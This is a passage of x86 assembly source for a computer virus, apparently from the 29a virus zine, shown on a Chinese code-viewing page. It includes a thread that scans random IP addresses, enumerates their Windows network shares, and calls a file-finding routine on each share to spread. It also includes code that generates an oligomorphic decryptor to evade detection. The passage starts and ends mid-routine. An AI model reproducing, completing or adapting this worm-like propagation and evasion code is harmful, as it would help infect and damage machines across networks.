📄 29a-7.002
字号:
push esi
push esi
call cCreateThread
;-----------------------------------------------------------------------------
;thread 3: find files on random IP address shares using non-recursive algorithm
;(alter class A: 25%, class b: 25%, class c: 25%, class d: scan all)
;-----------------------------------------------------------------------------
call cGetVersion
test eax, eax
mov eax, 'aten'
mov ecx, '23ip' ;"netapi32" (NT/2000/XP)
jns ip_loaddll
mov eax, 'arvs'
movzx ecx, cx ;"svrapi" (9x/Me)
ip_loaddll label near
pushfd
push 0
push ecx
push eax
push esp
call cLoadLibraryA
add esp, 0ch
popfd
jns ip_getprocnt
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
ip9xcrcbegin label near ;place < 80h bytes from call for smaller code
dd (ip9xcrc_count + 1) dup (0)
ip9xcrcend label near
dd offset ip_share - offset ip9xcrcend + 4
ip_getprocnt label near
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
ipntcrcbegin label near ;place < 80h bytes from call for smaller code
dd (ipntcrc_count + 1) dup (0)
ipntcrcend label near
dd offset ip_share - offset ipntcrcend + 4
ip_share label near
call random
xchg ebx, eax ;initial IP address
find_ip proc near
call random
and al, 18h
je find_ip ;select class A-C only
xchg ecx, eax
xor eax, eax
mov al, 0ffh
shl eax, cl ;select random class
and ecx, eax ;isolate new class
not eax
and ebx, eax ;remove old class
or ebx, ecx ;insert new class
ip_save label near
push ebx
bswap ebx
enter 34h, 0 ;size of Unicode '\\' + Unicode IP address + '\' + ANSI sharename
lea edi, dword ptr [ebp - 0eh] ;size of '\' + ANSI sharename
call cGetVersion
shr eax, 1fh ;0 if Unicode, 1 if ANSI
xchg esi, eax
xor al, al
mov cl, 0ah
std
stos byte ptr [edi]
mov edx, edi
stos byte ptr [edi] ;store Unicode sentinel
stos byte ptr [edi] ;store Unicode half-character
add edi, esi ;remove character if ANSI
;-----------------------------------------------------------------------------
;convert IP address to string (ANSI or Unicode)
;-----------------------------------------------------------------------------
ip_shift label near
xor eax, eax
shld eax, ebx, 8
ip_hex2dec label near
div cl
xchg ah, al
add al, '0'
stos byte ptr [edi]
xor al, al
stos byte ptr [edi] ;store Unicode half-character
add edi, esi ;remove character if ANSI
shr eax, 8
jne ip_hex2dec
mov al, '.'
stos byte ptr [edi]
xor al, al
stos byte ptr [edi] ;store Unicode half-character
add edi, esi ;remove character if ANSI
shl ebx, 8
jne ip_shift
cld
push edi
mov al, '\'
stos byte ptr [edi]
inc edi ;include Unicode half-character
sub edi, esi ;remove character if ANSI
stos byte ptr [edi] ;store '\\' in ANSI or Unicode
pop edi
test esi, esi
je ip_sharent
;-----------------------------------------------------------------------------
;enumerate shares on IP address (9x/Me platform)
;-----------------------------------------------------------------------------
push ebx
mov eax, esp
push ebx
push esp
push eax
push ebx ;too small size returns needed size
push ebx
push 1
push edi
mov ebx, edi
mov edi, edx
call dword ptr [esp + 44h + ip9xcrcstk.ip9xNetShareEnum + 18h]
pop ecx
pop esi
sub al, ERROR_MORE_DATA
jne ip_restore
imul esi, ecx, size share_info_19x + 50
;include size of optional remark
push esi
push eax ;GMEM_FIXED
call cGlobalAlloc
cdq
xchg ecx, eax
jecxz ip_restore
push ecx ;GlobalFree
push edx
mov eax, esp
push edx
push esp
push eax
push esi
push ecx
push 1
push ebx
mov esi, ecx
call dword ptr [esp + 48h + ip9xcrcstk.ip9xNetShareEnum + 18h]
pop ecx
pop ecx
mov al, '\'
stos byte ptr [edi]
ip_next9x label near
push ecx
push edi
movs dword ptr [edi], dword ptr [esi]
movs dword ptr [edi], dword ptr [esi]
movs dword ptr [edi], dword ptr [esi]
movs byte ptr [edi], byte ptr [esi] ;attach sharename
pop edi
push ebx
call cSetCurrentDirectoryA
xchg ecx, eax
jecxz ip_skip9x
;I dream of rain, I live my years under an open sky
call find_files
ip_skip9x label near
add esi, size share_info_19x - share_info_19x.shi1_pad1
pop ecx
loop ip_next9x
ip_free9x label near
call cGlobalFree
ip_restore label near
leave
pop ebx
inc bl
jne ip_save
push 20 * 60 * 1000 ;20 minutes
call cSleep
jmp find_ip
ip_sharent label near
;-----------------------------------------------------------------------------
;enumerate shares on IP address (NT/2000/XP platform)
;-----------------------------------------------------------------------------
push eax
mov eax, esp
push eax
mov ecx, esp
push ebx
push esp
push eax
push MAX_PREFERRED_LENGTH
push ecx
push 1
push edi
call dword ptr [esp + 44h + ipntcrcstk.ipntNetShareEnum + 1ch]
test eax, eax
pop esi
pop ebx
push esi ;NetApiBufferFree
jne ip_freent
ip_nextnt label near
push esi
lods dword ptr [esi]
push eax
xchg esi, eax
xor eax, eax ;lstrlenW
call store_krnapi
lea eax, dword ptr [eax + eax + 26h]
;include size of Unicode '\\' + Unicode IP address + Unicode '\'
push eax
push GMEM_FIXED
call cGlobalAlloc
xchg ecx, eax
jecxz ip_freent
push ecx ;GlobalFree
push ecx ;SetCurrentDirectoryW
push esi ;lstrcatW
push ecx ;lstrcatW
push '\'
push esp ;lstrcatW
push ecx ;lstrcatW
push edi
push ecx
push (krncrcstk.klstrcpyW - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi ;copy IP address
call clstrcatW ;attach '\'
pop eax
call clstrcatW ;attach sharename
push (krncrcstk.kSetCurrentDirectoryW - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
xchg esi, eax
call cGlobalFree
test esi, esi
je ip_skipnt
;when you look into the abyss, the abyss looks back at you
call find_files
ip_skipnt label near
pop esi
add esi, size share_info_1nt
dec ebx
jne ip_nextnt
ip_freent label near
call dword ptr [esp + 3ch + ipntcrcstk.ipntNetApiBufferFree + 4]
jmp ip_restore
find_ip endp
;-----------------------------------------------------------------------------
;create oligomorphic decryptor
;-----------------------------------------------------------------------------
storeebx proc near
test bh, 1 shl state_loadebx
jne storeebx_ret ;done already
mov al, 0bbh ;mov ebx
mov edx, esi
test bl, state_esifirst
jne storeebx_test ;esi first
mov dword ptr ds:[offset store_baseptr - offset efishnc_inf + expsize + 401001h], edi
jmp storeebx_now
storeebx_test label near
test bh, 1 shl state_loadesi
je storeebx_ret ;require esi first
mov al, 8dh ;lea
stos byte ptr [edi]
mov al, 9eh ;ebx, dword ptr [esi + ]
test bl, state_movesi
je storeebx_lea
mov al, byte ptr [esp + 8] ;source register
add al, 98h
storeebx_lea label near
sub edx, dword ptr [esp + 4] ;buffer offset
test bl, state_decdown
je storeebx_now
sub edx, vsize
sub edx, ecx
storeebx_now label near
inc bh ;or bh, 1 shl state_loadebx
storeebx_esi label near
stos byte ptr [edi]
xchg edx, eax
stos dword ptr [edi]
storeebx_ret label near
ret
storeebx endp
storeesi proc near
test bh, 1 shl state_loadesi
jne storeebx_ret ;done already
mov al, 0beh ;mov esi
test bl, state_movesi
je storeesi_mov
mov al, byte ptr [esp + 8] ;source register
add al, 0b8h
storeesi_mov label near
mov edx, dword ptr [esp + 4] ;buffer offset
test bl, state_esifirst
je storeesi_ebx ;ebx first
mov dword ptr ds:[offset store_baseptr - offset efishnc_inf + expsize + 401001h], edi
test bl, state_decdown
je storeesi_now
add edx, vsize
jmp storeesi_rand
storeesi_ebx label near
test bh, 1 shl state_loadebx
je storeebx_ret ⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -